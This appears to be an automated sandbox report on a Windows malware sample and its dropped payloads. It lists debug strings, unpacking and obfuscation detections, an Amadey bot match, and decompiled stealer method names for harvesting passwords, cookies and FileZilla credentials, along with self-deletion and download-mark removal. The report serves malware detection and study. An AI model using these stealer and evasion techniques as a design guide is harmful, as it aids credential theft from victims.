                        Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: C:\yacopicugux28_yero\lub.pdb source: D466.exe, 00000013.00000000.431033742.0000000000416000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.444432688.0000000000416000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.563965098.0000000000A40000.00000002.00020000.sdmp
                        Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: C:\yacopicugux28_yero\lub.pdb02`e@ source: D466.exe, 00000013.00000000.431033742.0000000000416000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.444432688.0000000000416000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.563965098.0000000000A40000.00000002.00020000.sdmp
                        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.493989773.0000000004B5D000.00000004.00000040.sdmp
                        Source: Binary string: Windows.Storage.pdbs|=M source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: =C:\xida\wimuhiwepivuz suv.pdb source: AA02.exe, 00000016.00000000.439528441.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: C:\xida\wimuhiwepivuz suv.pdb source: AA02.exe, 00000016.00000000.439528441.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: efDC:\duluh.pdb02`e@ source: QMn13jz6nj.exe, 00000000.00000002.303636479.0000000000415000.00000002.00020000.sdmp, QMn13jz6nj.exe, 00000000.00000000.297090292.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000000.401591547.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000002.421779029.0000000000415000.00000002.00020000.sdmp
                        Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: msimg32.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: C:\duluh.pdb source: QMn13jz6nj.exe, 00000000.00000002.303636479.0000000000415000.00000002.00020000.sdmp, QMn13jz6nj.exe, 00000000.00000000.297090292.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000000.401591547.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000002.421779029.0000000000415000.00000002.00020000.sdmp
                        Source: Binary string: C:\tok\micuh.pdb source: B6B5.exe, 00000019.00000000.448563265.0000000000401000.00000020.00020000.sdmp, B6B5.exe, 00000019.00000002.490272528.0000000000401000.00000020.00020000.sdmp, B6B5.exe, 0000001C.00000000.478287829.0000000000401000.00000020.00020000.sdmp

                        Data Obfuscation:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeUnpacked PE file: 22.2.AA02.exe.400000.0.unpack
                        Detected unpacking (changes PE section rights)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeUnpacked PE file: 11.2.A70A.exe.12e0000.0.unpack Unknown_Section0:ER;Unknown_Section1:W;.rsrc:R;Unknown_Section3:EW; vs Unknown_Section0:ER;Unknown_Section1:W;.rsrc:R;
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeUnpacked PE file: 22.2.AA02.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                        .NET source code contains method to dynamically call methods (often used by packers)Show sources
                        Source: 11.2.A70A.exe.12e0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_00403215 push ecx; ret
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00401880 push esi; iretd
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00402E94 push es; iretd
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_00402E94 push es; iretd
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_02BC3C01 push esi; ret
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_02BC3C66 push esi; ret
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_04793634 push es; iretd
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00401880 push esi; iretd
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00402E94 push es; iretd
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_00402E94 push es; iretd
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E1039 push B70F6E7Bh; iretd
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013EA244 push 0000006Ah; retf
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013EA2AE push 0000006Ah; retf
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013EA2AC push 0000006Ah; retf
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013DF76E push esi; ret
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E1ED4 push edi; retn 000Ch
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_009041AC push eax; retf 0005h
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004146F5 push ecx; ret
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0043F228 push ss; iretd
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00896ED6 push esp; ret
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 23_2_009941AC push eax; retf 0005h
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 23_2_02AC3CAF push esp; iretd
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 23_2_05DEB490 pushad ; ret
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 23_2_05DEFCF3 push 14057209h; retf
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_004087FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                        Source: A70A.exe.4.drStatic PE information: 0xD8CC78B8 [Thu Apr 5 03:15:04 2085 UTC]
                        Source: QMn13jz6nj.exeStatic PE information: section name: .livucuc
                        Source: QMn13jz6nj.exeStatic PE information: section name: .vuf
                        Source: QMn13jz6nj.exeStatic PE information: section name: .duha
                        Source: A70A.exe.4.drStatic PE information: section name:
                        Source: A70A.exe.4.drStatic PE information: section name:
                        Source: A70A.exe.4.drStatic PE information: section name:
                        Source: D466.exe.4.drStatic PE information: section name: .fefeg
                        Source: D466.exe.4.drStatic PE information: section name: .guyus
                        Source: D466.exe.4.drStatic PE information: section name: .venu
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name: .themida
                        Source: D375.exe.4.drStatic PE information: section name: .boot
                        Source: ddigjgj.4.drStatic PE information: section name: .livucuc
                        Source: ddigjgj.4.drStatic PE information: section name: .vuf
                        Source: ddigjgj.4.drStatic PE information: section name: .duha
                        Source: sqlite3.dll.22.drStatic PE information: section name: /4
                        Source: sqlite3.dll.22.drStatic PE information: section name: /19
                        Source: sqlite3.dll.22.drStatic PE information: section name: /35
                        Source: sqlite3.dll.22.drStatic PE information: section name: /51
                        Source: sqlite3.dll.22.drStatic PE information: section name: /63
                        Source: sqlite3.dll.22.drStatic PE information: section name: /77
                        Source: sqlite3.dll.22.drStatic PE information: section name: /89
                        Source: sqlite3.dll.22.drStatic PE information: section name: /102
                        Source: sqlite3.dll.22.drStatic PE information: section name: /113
                        Source: sqlite3.dll.22.drStatic PE information: section name: /124
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /4
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /19
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /35
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /51
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /63
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /77
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /89
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /102
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /113
                        Source: sqlite3[1].dll.22.drStatic PE information: section name: /124
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.46968213296
                        Source: initial sampleStatic PE information: section name: entropy: 7.99958739292
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.47748148421
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.03139365729
                        Source: initial sampleStatic PE information: section name: .text entropy: 6.94028321372
                        Source: initial sampleStatic PE information: section name: entropy: 7.97546579113
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.25113586904
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.46968213296
                        Source: 11.2.A70A.exe.12e0000.0.unpack, EntityCreator.csHigh entropy of concatenated method names: 'S??n', 'ScanPasswords', 'ScanCook', 'ScanFills', 'GetEntityCards', 'ReadRawData', 'ReadKey', 'MakeTries', 'EQQhVK0sySfSn9K9JZ', 'N71KZf1SWv1K2GDC5d'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.csHigh entropy of concatenated method names: '.cctor', 'gXrXJmbBk0fMg', 'VHnWmDmvPp', 'THRWAqJ2n8', 'SaxWJ28jWa', 'dvfWrrM8Ye', 'FPBWpsy6DI', 'lXgWI9Kghy', 'HsGWZme8nA', 'h0oWKi8BXG'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, FileZilla.csHigh entropy of concatenated method names: 'Scan', 'ScanCredentials', 'GetRecent', '.ctor', 'p35QMACOYsl47ibQuI', 'ePtFWMQSIhC0rn8m8W', 'R9DrRkkvQMHKMD0yqu', 'LEItYPRrklTjOdjHn8', 'VCoQdvm5lquKbRtw9c', 'XCunvihoIDluNWhDmU'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, CryptoHelper.csHigh entropy of concatenated method names: 'DecryptBlob', 'DecryptBlob', 'GetMd5Hash', 'GetHexString', 'oxpwRrHA7MtDBxSIru', 'Wt4xfA6vQLqOEQQNkl', 'HElv60jaJ8nsEr1lEN', 'hCQBb79rvYiWNO2DMT', 'KCJr4olaAr9jk2boMp', 'IhuDrrzFi7G6oWiNAf'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, NVP6cvsRm8LVKY2UGDp/dh5sYbsOQPvuwVEurZ3.csHigh entropy of concatenated method names: 'vVgkCk9peD', 'eBxqprrF8', 'LYQkSK2xW1', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'q4216ROghthnQHI5Mi', 'emXmspdyyJcJGsF0mk', 'q3PyHOVXHKKBqYCLdI', 'P8len2HbpjXgcuKmsm'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, SystemInfoHelper.csHigh entropy of concatenated method names: 'CreateBind', 'GetProcessors', 'GetGraphicCards', 'GetBrowsers', 'GetSerialNumber', 'ListOfProcesses', 'GetVs', 'GetProcessesByName', 'ListOfPrograms', 'AvailableLanguages'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, DownloadAndExecuteUpdate.csHigh entropy of concatenated method names: 'IsValidAction', 'Process', '.ctor', 'suCGZrgDquXtlnEU7PW', 'h1iJkRg4mk3lrbYRppI', 'xM4TErgyseDCOHyUlkR', 'tKb9k7gVpw5Vd8bDCaH', 'Xox03xgAXbFK73KqDBQ', 'N1C9TGgZGLfpmyueXSL', 'YISawpgBuhj5vmBy2dI'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, StringDecrypt.csHigh entropy of concatenated method names: 'Xor', 'FromBase64', 'BytesToStringConverted', 'Read', 'ghoRf92gfNog3T9p6kA', 'wUohRm2d2P26SHynAUm', 'uQeqla2o5hVxcSOrh8L', 'uPlOXQ22GGRNrpnOJjq', 'ceqq1M2JNoJRnyYmRPs', 'TnY1Ph2KJe7YqLpSP96'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, DesktopMessanger.csHigh entropy of concatenated method names: 'get_PassedPaths', 'set_PassedPaths', 'GetFolder', 'GetScanArgs', '.ctor', 'JDRJATJH8OsfAdRcXoU', 'GT8CtBJ6RU61J5dVXcR', 'nLbmJNJjb1O8aXmL2iJ', 'WObcxCJzgvpQlsvWcV8', 'PZKMpfgY3nXaWHFSaNL'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, FullInfoSender.csHigh entropy of concatenated method names: '.ctor', 'Send', 'sdfk8h34', 'Visible', 'asdk9y3', 'kadsoji83', 'kkdhfakdasd', 'sdfm83kjasd', 'sdfkas83', 'gkdsi8y234'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, Extensions.csHigh entropy of concatenated method names: 'ReadFile', 'ReadFileAsText', 'ChangeType', 'StripQuotes', 'DomainExists', 'PreCheck', 'sr4nxed2gajXEy6V6v3', 'IgFQ4fdJwdwfGXnXjK1', 'qifPHadg3fjdncPffFK', 'ltFUj4gz3op6nbcJlbG'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, TaskResolver.csHigh entropy of concatenated method names: '.ctor', 'get_Result', 'ReleaseUpdates', 'V0m281g9YIM4NbYDSha', 'AsE6jcglQi2iDoG9Uqi', 'kwUSnbgHZLVsMd2PiwR', 'GUJ8n3g6xBc6RbaApvU', 'WinHfOgM2rluFJ2EYT0', 'ipVybUgwKLmQrLxQ9qN'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, IPv4Helper.csHigh entropy of concatenated method names: 'IsLocalIp', 'GetDefaultIPv4Address', 'Request', 'l6wgX0dmeglkHJ0WPMy', 'Y98T2IdhCOMvBEtyswu', 'u07E63dkK7KQsv6UfkC', 'NUDS7adRiWPUSIrpwkA', 'dNXam6dTeWI9CfTKAHX', 'k0N7SJdvqtsUlBhKKt7', 'OcvvkVdEOFt3WV8LRWT'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, GdiHelper.csHigh entropy of concatenated method names: 'GetCaps', 'GetWindowsScreenScalingFactor', 'MonitorSize', 'GetImageBase', 'ConvertToBytes', 'pI7r7Md3soxSL9mb8KT', 'r4XL9hdtk8GlgbO4lV1', 'AdGD67dNXHCPifdiUjC', 'gtxaWkdao542VDfu7cK', 'hg7b6fdO0cE9xI9o5eN'

                        Persistence and Installation Behavior:

                        barindex
                        Yara detected Amadey botShow sources
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile created: C:\ProgramData\sqlite3.dllJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ddigjgjJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D466.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile created: C:\ProgramData\sqlite3.dllJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EE61.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B6B5.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D375.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\AA02.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ddigjgjJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dllJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A70A.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C169.exeJump to dropped file

                        Hooking and other Techniques for Hiding and Protection:

                        barindex
                        Deletes itself after installationShow sources
                        Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\qmn13jz6nj.exeJump to behavior
                        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ddigjgj:Zone.Identifier read attributes | delete
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0040C0B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess information set: NOOPENFILEERRORBOX
